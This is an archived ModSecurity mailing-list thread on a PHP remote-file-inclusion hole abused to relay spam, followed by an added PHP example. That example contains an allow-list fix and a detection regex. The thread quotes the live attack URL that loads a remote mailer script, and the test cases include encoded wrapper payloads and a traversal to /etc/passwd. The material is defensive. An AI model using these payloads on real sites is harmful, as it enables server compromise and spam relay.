[Modsecurity] Spam injection, very sneaky

Michael Shinn mike at gotroot.com
Fri Oct 13 23:18:31 EDT 2006


Thank you all for the report. The generic sigs should have caught this,
but I'm never happy with a should, so I just tuned this sig to make it
even broader in case I missed something (please let me know about all
false positives).

I just added another rule to catch any other variations of this I might
have missed.  To that end, if anyone sees rule 300040 fire (ever!)
please let me know and send me your audit_log entries.  This should
catch the exception that I just can't presently imagine, and I always
appreciate new opportunities to make the sigs better.

Thank you again for the report, please keep them coming as I'm always
happy to make more sigs.  :-)

New release coming out in a few minutes.

On Fri, 2006-10-13 at 17:11 -0400, Michal Wallace wrote:
> On Fri, 13 Oct 2006, MIKE YRABEDRA wrote:
> 
> > I have been using modsec to block all sorts of spam injection, but I have
> > found a new one.
> > 
> > I have a client that has a blanket-style page that includes anything sent
> > to it.  Like so...
> > 
> > <? include($content); ?>
> > 
> > So if someone does this...
> > 
> > http://www.somesite.com/folder/index.php?content=http://home.arcor.de/dumpxpl/mail.php?
> > 
> > ..bad things happen. In my case over 100k of spam being relayed by my
> > server.
> > 
> > I caught this guy using modsec and searching ARGS with the same text as in
> > the spam. This is OK for now, until he uses a different spam.
> > 
> > 
> > The php script that did the damage can be seen here...
> > http://home.arcor.de/dumpxpl/mail.php
> > 
> > Is there a modsec rule that will prevent this sort of thing?
> 
> Hey Mike,
> 
> PHP's remote include "feature" is wrong
> on so many levels. One thing you can do in
> this case is have the client sanitize the 
> $content variable so it doesn't do this.
> There's usually no reason it has to have 
> the http:// in there, and if there is,
> you can limit it to the sites he actually
> wants to use.
> 
> Or he could just fetch the url and print
> the contents, rather than using include().
> 
> Or you could patch PHP so it doesn't let
> this happen:
> 
>     http://www.hardened-php.net/
> 
> At the very least, you should scan for 
> http:// in the args. I'm surprised the gotroot
> rules didn't catch this. I'm pretty sure 
> there was a rule that did this already for 
> any php file.
> 
> Sincerely,
>  
> Michal J Wallace
> Sabren Enterprises, Inc.
> -------------------------------------
> contact: michal at sabren.com
> hosting: http://www.cornerhost.com/
> my site: http://www.withoutane.com/
> -------------------------------------
> 
> _______________________________________________
> Modsecurity mailing list
> Modsecurity at gotroot.com
> http://lists.gotroot.com/mailman/listinfo/modsecurity
-- 
Michael T. Shinn                                    KeyID:0xDAE2EC86
Key Fingerprint:  1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86
  
Got Root?  http://www.gotroot.com
modsecurity rules: http://www.modsecurityrules.com
Troubleshooting Firewalls:  http://troubleshootingfirewalls.com
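As an added example, not code from the thread and not part of the gotroot rule set, the reported `include($content)` pattern is shown next to a hardened replacement in modern PHP: the template name is resolved through a fixed allow-list (the sanitisation Michal suggests), and a separate check shows what a rule that "scans for http:// in the args" has to handle once values are URL-decoded. The `TEMPLATE_DIR` path, the `TEMPLATES` map, the host `evil.example` and the function names are assumptions for illustration; the sample values at the bottom are constructed.

```php
<?php
// Added example, not from the thread or the gotroot rules. Shows the
// reported vulnerable pattern next to a hardened replacement. TEMPLATE_DIR,
// the TEMPLATES map, evil.example and the function names are assumptions.

// Reported pattern (do not use): with remote URL wrappers enabled,
//   <? include($content); ?>
// fetches and executes whatever ?content=http://... points at.

const TEMPLATE_DIR = __DIR__ . '/templates';

// Allow-list: a short token chosen by the user maps to a fixed local file.
// The token itself is never used as a path, so schemes, slashes and ".."
// cannot reach include() at all.
const TEMPLATES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_template(string $content): ?string
{
    if (!array_key_exists($content, TEMPLATES)) {
        return null;
    }
    return TEMPLATE_DIR . '/' . TEMPLATES[$content];
}

// What a WAF rule that "scans for http:// in the args" has to handle: the
// value is matched after URL-decoding (twice, so a double-encoded
// %253a%252f%252f is normalised too) and case-insensitively, and the other
// include wrappers an attacker can use are listed alongside http.
function looks_like_remote_include(string $value): bool
{
    $decoded = rawurldecode(rawurldecode($value));
    return (bool) preg_match(
        '~\b(?:(?:https?|ftps?|php|expect):\s*//|data:)~i',
        $decoded
    );
}

// Request handler: reject remote-include attempts outright, then resolve
// the template through the allow-list. Returns a description of the
// decision instead of actually including, so it can be run from the CLI.
function handle_request(array $get): string
{
    $content = $get['content'] ?? 'home';
    if (looks_like_remote_include($content)) {
        return 'blocked: remote include attempt';
    }
    $path = resolve_template($content);
    if ($path === null) {
        return 'not found: unknown template';
    }
    // In the real page this is where include $path; would run.
    return 'include ' . $path;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample values as they would appear in $_GET['content'].
    $cases = [
        'home'                                   => 'include',
        'http://home.arcor.de/dumpxpl/mail.php?' => 'blocked',   // the reported payload
        'HTTP%3A%2F%2Fevil.example%2Fmail.php'   => 'blocked',   // double-encoded on the wire
        'php://input'                            => 'blocked',   // another wrapper, same effect
        '../../../../etc/passwd'                 => 'not found', // local traversal: not on the list
        'home.php'                               => 'not found', // only tokens, never file names
    ];
    foreach ($cases as $value => $expected) {
        $got = handle_request(['content' => $value]);
        $ok  = strpos($got, $expected) === 0 ? 'ok  ' : 'FAIL';
        printf("%s  %-40s -> %s\n", $ok, $value, $got);
    }
}
```

Run it with `php rfi.php`; each sample line prints `ok` or `FAIL` with the decision taken. The allow-list is the fix that matters, because it also stops local traversal and file-name guessing that no `http://` rule would see; the decoding check is there to show why a literal match on `http://` in a WAF rule is easy to step around with `%3A%2F%2F` or mixed case. Independently of either, turning off the remote URL wrappers in php.ini (`allow_url_fopen = Off`, and `allow_url_include = Off` in PHP 5.2 and later) removes the capability from include() altogether.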


